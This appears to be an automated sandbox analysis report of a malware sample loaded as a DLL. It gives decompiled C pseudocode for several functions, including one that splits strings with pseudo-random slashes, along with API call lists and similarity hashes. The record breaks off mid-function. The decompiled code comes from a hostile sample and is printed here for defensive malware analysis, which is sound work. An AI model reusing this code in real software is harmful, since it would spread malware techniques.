                                                                                                                                                                                                                                    				if(E02F9A72D(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t40 = CreateEventA(0x2f9d2a8, 1, 0,  *0x2f9d344);
                                                                                                                                                                                                                                    				if(_t40 != 0) {
                                                                                                                                                                                                                                    					SetEvent(_t40);
                                                                                                                                                                                                                                    					Sleep(0xbb8);
                                                                                                                                                                                                                                    					CloseHandle(_t40);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_push( &_v32);
                                                                                                                                                                                                                                    				if(_a12 == 0) {
                                                                                                                                                                                                                                    					_t29 = E02F98A51(_t36);
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_t29 = E02F917D5(_t36);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t41 = _v16;
                                                                                                                                                                                                                                    				_t38 = _t29;
                                                                                                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                                                                                                    					E02F91F99(_t41);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                                                    					_t38 = E02F942EA( &_v32, _t39);
                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    0x02f93c7c
                                                                                                                                                                                                                                    0x02f93c70
                                                                                                                                                                                                                                    0x02f93c70
                                                                                                                                                                                                                                    0x02f93c71
                                                                                                                                                                                                                                    0x02f93c72
                                                                                                                                                                                                                                    0x02f93c73
                                                                                                                                                                                                                                    0x02f93c74
                                                                                                                                                                                                                                    0x02f93c75
                                                                                                                                                                                                                                    0x02f93c75
                                                                                                                                                                                                                                    0x02f93c81
                                                                                                                                                                                                                                    0x02f93c86
                                                                                                                                                                                                                                    0x02f93c88
                                                                                                                                                                                                                                    0x02f93c8a
                                                                                                                                                                                                                                    0x02f93c8a
                                                                                                                                                                                                                                    0x02f93c91
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93c93
                                                                                                                                                                                                                                    0x02f93c93
                                                                                                                                                                                                                                    0x02f93ca0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93ca0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(02F9D2A8,00000001,00000000,00000040,00000001,?,76D7F710,00000000,76D7F730,?,?,?,02F96880,?,00000001,?), ref: 02F93C42
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,02F96880,?,00000001,?,00000002,?,?,02F92417,?), ref: 02F93C4F
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8,?,?,?,02F96880,?,00000001,?,00000002,?,?,02F92417,?), ref: 02F93C5A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,02F96880,?,00000001,?,00000002,?,?,02F92417,?), ref: 02F93C61
                                                                                                                                                                                                                                      • Part of subcall function 02F98A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,02F93C81,?,02F93C81,?,?,?,?,?,02F93C81,?), ref: 02F98B2B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2559942907-0
                                                                                                                                                                                                                                    • Opcode ID: e9650a71283e404cdc7f8d225872676838c0b56873d545df934f5a790644968d
                                                                                                                                                                                                                                    • Instruction ID: 8e055b07beb7b751d89eec0adb1d50c01ff6e403c06410d78de08ae6c3a5e0f3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9650a71283e404cdc7f8d225872676838c0b56873d545df934f5a790644968d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB219272D0021DABEF10BFE498849EEB7BAEF483D4B014469EB11E7200D775D985CBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E02F9788B(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                                                    				signed short _t23;
                                                                                                                                                                                                                                    				char* _t27;
                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				unsigned int _t33;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				unsigned int _t38;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t42 = __eax;
                                                                                                                                                                                                                                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                                    				_t38 = __eax;
                                                                                                                                                                                                                                    				_t30 = RtlAllocateHeap( *0x2f9d238, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                                    				_v12 = _t30;
                                                                                                                                                                                                                                    				if(_t30 != 0) {
                                                                                                                                                                                                                                    					_v8 = _t42;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t33 = 0x18;
                                                                                                                                                                                                                                    						if(_t38 <= _t33) {
                                                                                                                                                                                                                                    							_t33 = _t38;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t21 =  *0x2f9d250; // 0xd1e1022a
                                                                                                                                                                                                                                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                                    						 *0x2f9d250 = _t23;
                                                                                                                                                                                                                                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                                    						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                                    						_v8 = _v8 + _t45;
                                                                                                                                                                                                                                    						_t27 = _t30 + _t45;
                                                                                                                                                                                                                                    						_t38 = _t38 - _t45;
                                                                                                                                                                                                                                    						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                                    						 *_t27 = 0x2f;
                                                                                                                                                                                                                                    						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                                    						_t30 = _t13;
                                                                                                                                                                                                                                    					} while (_t38 > 8);
                                                                                                                                                                                                                                    					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02F9839A,00000000,?,?,02F9A428,?,033E95B0), ref: 02F97896
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 02F978AE
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,02F9839A,00000000,?,?,02F9A428,?,033E95B0), ref: 02F978F2
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000001,?,00000001), ref: 02F97913
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1819133394-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E02F97A9A(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                    				char* _t18;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t19 = 0x27;
                                                                                                                                                                                                                                    				_t1 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                    				_t18 = 0;
                                                                                                                                                                                                                                    				E02F96B43(_t8, _t1);
                                                                                                                                                                                                                                    				_t16 = E02F92049(_t19);
                                                                                                                                                                                                                                    				if(_t16 != 0) {
                                                                                                                                                                                                                                    					_t3 =  &_v20; // 0x74666f53
                                                                                                                                                                                                                                    					_t13 = E02F986D8(_t3, _t16, _a8);
                                                                                                                                                                                                                                    					if(_a4 != 0) {
                                                                                                                                                                                                                                    						__imp__(_a4);
                                                                                                                                                                                                                                    						_t19 = _t13 + 0x27;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t18 = E02F92049(_t19);
                                                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                                                    						 *_t18 = 0;
                                                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                                                    							__imp__(_t18, _a4);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__imp__(_t18, _t16);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E02F99039(_t16);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t18;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                      • Part of subcall function 02F986D8: wsprintfA.USER32 ref: 02F98734
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(02F923E9,00000000,00000000,00000027,00000005,00000000,00000000,02F996DA,74666F53,00000000,02F923E9,02F9D00C,?,02F923E9), ref: 02F97AD0
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02F97AF4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02F97AFC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: Soft
                                                                                                                                                                                                                                    • API String ID: 393707159-3753413193
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F97C61(void* __esi) {
                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v4;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                                    				memset(__esi, 0, 0x38);
                                                                                                                                                                                                                                    				_t8 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                    				 *(__esi + 0x1c) = _t8;
                                                                                                                                                                                                                                    				if(_t8 != 0) {
                                                                                                                                                                                                                                    					_t10 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                    					 *(__esi + 0x20) = _t10;
                                                                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                                                                    						CloseHandle( *(__esi + 0x1c));
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_v4 = 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v4;
                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F97C6F
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76D681D0), ref: 02F97C84
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02F97C91
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02F97CA3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandlememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2812548120-0
                                                                                                                                                                                                                                    • Opcode ID: d64ba341f49425c89a8e5a0197cf30968aa0e3caa55d6908fb92002039179115
                                                                                                                                                                                                                                    • Instruction ID: a4ee9a7eb9fff7b314be4cb3c906ac431c83819354216d64c2c24ebf67e52af8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d64ba341f49425c89a8e5a0197cf30968aa0e3caa55d6908fb92002039179115
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8F0FEF551430CBFF7146F26ECC1C27FBACFB851D9B11892EF14681551D632A8198AB0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E02F975E9(void** __esi) {
                                                                                                                                                                                                                                    				char* _v0;
                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				void** _t14;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t14 = __esi;
                                                                                                                                                                                                                                    				_t4 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t6 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t8 =  *_t14;
                                                                                                                                                                                                                                    				if(_t8 != 0 && _t8 != 0x2f9d030) {
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, 0, _t8);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t14[1] = E02F994A9(_v0, _t14);
                                                                                                                                                                                                                                    				_t11 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    				_t12 = _t11 + 0x40;
                                                                                                                                                                                                                                    				__imp__(_t12);
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(033E9570), ref: 02F975F2
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,02F923DE), ref: 02F975FC
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,02F923DE), ref: 02F97624
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(033E9570), ref: 02F97640
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                    • Opcode ID: 750d8d3ab05413484c62d070fe3b28590a24d51cd1051112ee9a4e0782a18593
                                                                                                                                                                                                                                    • Instruction ID: 31a8b6a194a7e0959e27bf4f86b76efb46bb4036894a08705669de8123c3e5ef
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 750d8d3ab05413484c62d070fe3b28590a24d51cd1051112ee9a4e0782a18593
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F0DAB1E50245DBEB14AB79D949F16F7A4AF18BC1F148806FA02D6260D770E820CE25
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9970F() {
                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                    				intOrPtr _t5;
                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t1 =  *0x2f9d26c; // 0x344
                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				SetEvent(_t1);
                                                                                                                                                                                                                                    				_t11 = 0x7fffffff;
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					SleepEx(0x64, 1);
                                                                                                                                                                                                                                    					_t5 =  *0x2f9d2b8; // 0x0
                                                                                                                                                                                                                                    					if(_t5 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                                    					if(_t11 > 0) {
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t6 =  *0x2f9d26c; // 0x344
                                                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t7 =  *0x2f9d238; // 0x2ff0000
                                                                                                                                                                                                                                    				if(_t7 != 0) {
                                                                                                                                                                                                                                    					HeapDestroy(_t7);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000344,00000001,02F98099), ref: 02F9971A
                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 02F99729
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000344), ref: 02F9974A
                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32(02FF0000), ref: 02F9975A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4109453060-0
                                                                                                                                                                                                                                    • Opcode ID: 63fbbb30a98c24bc0c01b7e78cb421ab49d1d8ec801e4bdd76362c25717e58ca
                                                                                                                                                                                                                                    • Instruction ID: 1292c529d8555b9010170fbaccf787a4b883112d8d3bc7182c1e8621cfb80e0d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63fbbb30a98c24bc0c01b7e78cb421ab49d1d8ec801e4bdd76362c25717e58ca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F0A030F8530C4BEF207F36A888B06B7A8AB04FD0B160E09BA14D3290DF66D420D661
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E02F9A5D6() {
                                                                                                                                                                                                                                    				void* _v0;
                                                                                                                                                                                                                                    				void** _t3;
                                                                                                                                                                                                                                    				void** _t5;
                                                                                                                                                                                                                                    				void** _t7;
                                                                                                                                                                                                                                    				void** _t8;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t3 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t5 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t7 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    				_t10 =  *_t7;
                                                                                                                                                                                                                                    				if(_t10 != 0 && _t10 != 0x2f9e836) {
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, 0, _t10);
                                                                                                                                                                                                                                    					_t7 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				 *_t7 = _v0;
                                                                                                                                                                                                                                    				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                                                    				__imp__(_t8);
                                                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(033E9570), ref: 02F9A5DF
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,02F923DE), ref: 02F9A5E9
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,02F923DE), ref: 02F9A617
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(033E9570), ref: 02F9A62C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                    • Opcode ID: 548a4c8a5815ff39cbcfbba6932f447144e8349288b811b50697e95987ad1d9a
                                                                                                                                                                                                                                    • Instruction ID: f1fddffa12cff8efa24cbea7ea277e566a712b5004fa46ca7ace0da4527cc0dd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 548a4c8a5815ff39cbcfbba6932f447144e8349288b811b50697e95987ad1d9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F0D474E801049BEB18DB74D859E15F7A4EB08BC2F24880AEA02DB360C730EC20CE24
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E02F97F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                    				int _t42;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t17 = __eax;
                                                                                                                                                                                                                                    				_t37 = 0;
                                                                                                                                                                                                                                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                                    				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                                    				_t28 = _t2;
                                                                                                                                                                                                                                    				_t34 = E02F92049(_t2);
                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                    					_t30 = E02F92049(_t28);
                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                    						E02F99039(_t34);
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t39 = _a4;
                                                                                                                                                                                                                                    						_t22 = E02F9A911(_t39);
                                                                                                                                                                                                                                    						_v8 = _t22;
                                                                                                                                                                                                                                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                                    							_a4 = _t39;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t26 = _t22 + 2;
